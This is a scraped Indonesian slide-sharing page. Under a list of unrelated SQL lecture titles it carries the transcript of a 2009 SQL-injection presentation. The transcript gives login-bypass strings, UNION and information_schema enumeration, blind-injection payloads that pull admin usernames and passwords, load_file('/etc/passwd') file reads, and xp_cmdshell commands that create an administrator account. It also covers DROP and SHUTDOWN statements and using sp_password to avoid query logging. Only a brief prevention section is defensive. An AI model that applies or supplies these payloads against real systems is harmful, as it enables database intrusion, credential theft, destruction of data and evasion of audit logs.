27 maret 2009 by : nazRuL [at] delaforta.net.

Slides:

Advertisements

Presentasi serupa

Advertisements

Sejarah (1) • Tahun 1974, Dr. Chamberlin dari Saan Jose Laboratorium IBM mendefinisikan sebuah bahasa untuk mengakses database yang disebut dengan SEQUEL.

Widhy Hayuhardhika NP, S.Kom.  PHP – MySql installed  MySql telah running (cek xampp control panel)  Database  Tabel  Query  SQL (Structured Query.

Pertemuan 2 : Dasar-dasar SQL SBD C – Senin, Frank & Rudy

Pemrograman WEB Pertemuan 6

Menggunaka n alter dan perintah DML PEMROGRMAN WEB 1 Asfan Muqtadir, S.Kom.

Database Create-Retrieve-Update-Delete (CRUD)

SQL Basis Data.

SISTEM BASISDATA Lasmedi Afuan, ST.,M.Cs. SQL (S RUCTURE Q UERY L ANGUAGE ) Query/SQL : Bahasa standar yang digunakan untuk mengakses basisdata. Standar.

Oleh : Kholid Fathoni, S.Kom., M.T.

MEMBUAT HALAMAN LOGIN dan PENGGUNAAN SESSION

CHANGE DATA CAPTURE.

SQL 1 KTI by dna.  Merupakan bahasa query standar yang digunakan untuk mengakses basis data relasional  Jenis SQL yaitu 1. interactive  langsung dapat.

Pemrograman Visual II Database Management System (DBMS) Oleh: Erna Sri Hartatik, S.Kom

Pemrograman Web/MI/D3 sks

Microsoft SQL Server DDL dan DML dasar

Fungsi Agregat fungsi yang mengambil suatu kumpulan nilai-nilai sebagai input dan mengembalikan satu nilai sebagai output Select fungsi agregat SUM/AVG/MIN/MAX/COUNT.

Data Definition Language dan Data Manipulation Language

METOD POST (FILE PENGIRIM)

PRAKTIKUM 3 PEMROGRAMAN BASIS DATA. Menghapus baris  Deleting rows- DELETE FROM Use the DELELE FROM command to delete row(s) from a table, with the following.

Antonius Wahyu Sudrajat, S. Kom., M.T.I. Perintah SQL: Data Definition.

Data Types Data Definition Language Referential Constraint SQL Query

SQL = Structure Query Language

SQL (Structure Query Language)

Koneksi PHP ke Database MySQL

BAHASA QUERY TERAPAN OLEH : HARSITI, ST.

Mengelola Security Database

Sistem Basis Data Pertemuan 11 Presented by :

MANAJEMEN BASIS DATA Pertemuan 8 SUBQUERY.

STRUCTURED QUERY LANGUAGE (SQL)

Data Manipulation Language

Data Manipulation Language Presented by : Herianto.

Dasar query basis data dengan SQLite

Modul SBD-2 …….. SQL Server

Pertemuan after UTS Structure Query Language (SQL)

Pengamanan Sistem Jaringan

Pemrograman internet ABU SALAM, M.KOM.

PEMASARAN BERBASIS WEB

FUNGSI-FUNGSI AKSES MySql

Konsep Teknologi Informasi B

SQL (Structure Query Language)

Manajemen Basis Data menggunakan SQL Server

Konsep Teknologi Informasi B

SQL (Structured Query Language)

PEMASARAN BERBASIS WEB

Stucture Query Language

Stucture Query Language

Structured Query Language (SQL)

Pengenalan MySQL An’ Anqinudin L.

Pengembangan Web Ramos Somya, S.Kom., M.Cs.

Structured Query Language

Data Manipulation Language (DML)

SQL.... Kependekan dari Structured Query Language.

Aplikasi Database Dosen : Sarwo, Skom,.Mkom Url :

Pemrograman Berorientasi Platform (IN315B) Ramos Somya, S.Kom., M.Cs.

Konsep dasar sistem basis data By K’ ILO ^_^

Stucture Query Language

HAIRUL ANUAR BIN HJ. MASROL

Referensi Bahasa MySQL

Stucture Query Language

MEMBANGUN DATABASE DENGAN MySQL

SQL dan Database MySQL.

BAHASA BASIS DATA Data Manipulation Languange

Pengantar Teknologi SIM 2 (pertemuan 7)

Transcript presentasi:

27 maret 2009 by : nazRuL [at] delaforta.net

Introduction SQL INJECTION SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

Simple Concept ‘ or 1=1-- ‘or ‘’ = ‘ ' or 1=1# ') or '1'='1-- admin'/* etc.....

MySQL Injection Input yang tak tervalidasi Penambahan tanda petik (‘) Pengujian dengan Query “AND”

INJECTION... CARI JUMLAH TABEL => ORDER BY CARI LETAK KOLOM => UNION SELECT CARI NAMA TABLE > information.schema > limit > group_concat

INJECTION (Continue...) * Let’s Get the XxX.. CARI NAMA KOLOM > information.schema > ‘table_name ‘ == hexa_string > limit > group_concat * Let’s Get the XxX..

THE SECRET DIBALIK table information .schema

Adavanced... * Magic Query .:. load_file(‘/path/file’); ex : /etc/passwd .:. into dumpfile (‘/path/fle’); Ex : /tmp/blabla > perm 777 /path/yang/diketahui/

MS-SQL Injection Input yang tak tervalidasi Penambahan tanda petik (‘) Pengujian dengan Query “AND”

INJECTION... Mencari nama-nama tabel => having 1=1-- (memanfaatkan error Query SQL) Memanfaatkan query “group by” => (group by table,table having 1=1--)

INJECTION... DATA MANIPULATION * UPDATE (update table_name set column2 where column1=n) * INSERT (insert into table_name values(n,’isi’) * DROP (drop table table_name) * SHUTDOWN

Adavanced... * Magic Query .:. Check status user convert(int,(select+user));-- .:. CMD SheLL queryf - * exec+master..xp_cmdshell ‘net user uname pass /add’ * exec+master..xp_cmdshell ‘net localgroup administartor uname /add’

Pencegahan - PHP based - ASP based Convert all to Int ‘Magic’ quotes Off <strip_tags> addslashes function - ASP based Replace ‘ to “ SQL Error Handling

Blind-SQL Injection Pengertian....

Blind-SQL => WHERE+table_name+NOT+IN+(‘table_yg_muncul’) # Pencarian table_admin, username ataupun passowrd # UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES => WHERE+table_name+NOT+IN+(‘table_yg_muncul’) UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=‘table_yg_diinginkan‘ => WHERE+table_name='user'+AND+ column_name+NOT+ IN+(‘column_yg_muncul’) UNION+SELECT+1,2,user,pass,4+FROM+table_admin

# Tips # Mengunakan Concatenation “untuk menampilkan field dengan banyak column_name” ID+’:’+username+’:’+userpass  ( ID%2B':'%2Busername%2B':'%2Buserpass ) # Menggunakan --sp_password “sp_password berfungsi agar mssql tidak melakukan logs query pada mssql ( kemungkinan hanya terlog pada server) > sering di temui pada web aplication: asp,cfm,aspx, etc..